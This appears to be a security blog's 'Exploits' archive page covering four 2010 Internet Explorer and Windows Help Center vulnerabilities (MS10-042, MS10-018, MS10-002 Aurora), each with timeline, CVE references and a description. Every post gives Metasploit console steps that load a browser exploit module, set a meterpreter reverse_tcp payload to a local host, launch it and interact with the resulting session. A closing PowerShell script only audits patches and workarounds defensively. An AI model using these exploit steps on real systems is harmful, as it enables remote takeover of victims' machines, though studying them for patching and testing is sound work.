Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

MS10-042 : Microsoft Windows Help Center XSS and Command Execution

Timeline :

Vulnerability & PoC disclosed by Tavis Ormandy on 2010-06-10
Metasploit PoC provided by natron on 2010-06-10
Microsoft patch “KB2229593” released on 2010-07-13

PoC provided by :

Tavis Ormandy
natron

Reference(s) :

CVE-2010-1885
MS10-042

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8

Tested on Windows XP SP3 with :

Internet Explorer 8

Description :

Help and Support Center is the default application provided to access online documentation for Microsoft Windows. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme “hcp”. Due to an error in validation of input to hcp:// combined with a local cross-site scripting vulnerability and a specialized mechanism to launch the XSS trigger, arbitrary command execution can be achieved. On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it can be used to launch the exploit automatically. If IE8 and WMP11 are installed, either can be used to launch the attack, but both pop up dialog boxes asking the user if execution should continue. This exploit detects if non-intrusive mechanisms are available and will use one if possible. In the case of both IE8 and WMP11, the exploit defaults to using an iframe on IE8, but is configurable by setting the DIALOGMECH option to “none” or “player”.

Commands :

use windows/browser/ms10_042_helpctr_xss_cmd_exec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-018 : Microsoft Internet Explorer DHTML Behaviors Use After Free

Timeline :

Microsoft advisory MSA981374 released on 2010-03-09
Exploit-DB PoC provided by Trancer on 2010-03-10
Metasploit PoC provided by jduck on 2010-03-10
Microsoft patch “KB980182” released on 2010-03-30

PoC provided by :

unknown
Trancer
Nanika
jduck

Reference(s) :

CVE-2010-0806
MS10-018

Affected version(s) :

Internet Explorer 6
Internet Explorer 7

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB980182

Description :

This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in the wild and was previously known as the “iepeers” vulnerability. The name comes from Microsoft’s suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, “The bug itself is when trying to persist an object using the setAttribute, which ends up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which derefs the reference and cleans the object.” NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.

Commands :

use windows/browser/ms10_018_ie_behaviors
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-018 : Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption

Timeline :

Vulnerability privately disclosed to Microsoft by ZDI on 2009-10-20
Microsoft patch “KB980182” released on 2010-03-30
Metasploit PoC provided by jduck on 2010-04-05

PoC provided by :

Anonymous
jduck

Reference(s) :

CVE-2010-0805
MS10-018

Affected version(s) :

Internet Explorer 5
Internet Explorer 6

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB980182

Description :

This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that versions 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the “DataURL” parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code.

Commands :

use windows/browser/ms10_018_ie_tabular_activex
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-002 : Internet Explorer Aurora Memory Corruption

Timeline :

Microsoft learned of the vulnerability on 2010-01-13
Metasploit PoC provided by hdm on 2010-01-15
Exploit-DB PoC provided by Ahmed Obied on 2010-01-17
Microsoft patch “KB978207” released on 2010-01-21

PoC provided by :

unknown
hdm

Reference(s) :

CVE-2010-0249
MS10-002

Affected version(s) :

Internet Explorer 5
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB978207

Description :

This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the Operation Aurora attacks that led to the compromise of a number of high-profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, and as such only Internet Explorer 6 can be reliably exploited.

Commands :

use exploit/windows/browser/ms10_002_aurora
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig
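As an added defender-side check (my own script, not part of the original posts or of the Metasploit modules), the following PowerShell audits a Windows host for the patches and workarounds that close the four issues above: the KB numbers come from the timelines, the hcp:// handler check matches Microsoft's MS10-042 "unregister the HCP protocol" workaround, and the kill-bit check assumes the Tabular Data Control CLSID {333C7BC4-460F-11D0-BC04-0080C7055A83} from Microsoft's MS10-018 workaround. It assumes PowerShell 2.0 or later (for Get-HotFix) and an elevated prompt.

```powershell
# Added audit script: reports whether the attack surface used by the four Metasploit
# modules above is still present on this host. Nothing here modifies the system.

# KB numbers as listed in the timelines of each post.
$patches = @{
    'MS10-042' = 'KB2229593'   # Help Center hcp:// XSS / command execution
    'MS10-018' = 'KB980182'    # DHTML behaviors UAF and Tabular Data Control
    'MS10-002' = 'KB978207'    # Aurora memory corruption
}

# Get-HotFix exposes installed updates via WMI (Win32_QuickFixEngineering).
$installed = Get-HotFix | ForEach-Object { $_.HotFixID }

foreach ($bulletin in $patches.Keys) {
    $kb = $patches[$bulletin]
    if ($installed -contains $kb) {
        Write-Output "[OK]      $bulletin : $kb is installed"
    } else {
        Write-Output "[MISSING] $bulletin : $kb not found, host is likely vulnerable"
    }
}

# MS10-042 workaround: the hcp: scheme is registered as a protocol handler under HKCR\HCP.
# If the key still exists, hcp:// URLs are routed to Help and Support Center.
if (Test-Path 'Registry::HKEY_CLASSES_ROOT\HCP') {
    Write-Output "[WARN]    hcp:// protocol handler is still registered (MS10-042 workaround not applied)"
} else {
    Write-Output "[OK]      hcp:// protocol handler is unregistered"
}

# MS10-018 workaround: an ActiveX kill bit is a DWORD 'Compatibility Flags' with bit 0x400 set
# under the control's CLSID. Assumed CLSID: Tabular Data Control (see lead-in).
$tdcKey = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{333C7BC4-460F-11D0-BC04-0080C7055A83}'
$flags  = (Get-ItemProperty -Path $tdcKey -ErrorAction SilentlyContinue).'Compatibility Flags'
if ($flags -band 0x400) {
    Write-Output "[OK]      Tabular Data Control kill bit is set"
} else {
    Write-Output "[WARN]    Tabular Data Control kill bit is not set"
}
```

A missing KB together with an unapplied workaround is the condition under which the corresponding module above succeeds against an IE6/IE7 user on the host; either the patch or the workaround closes it.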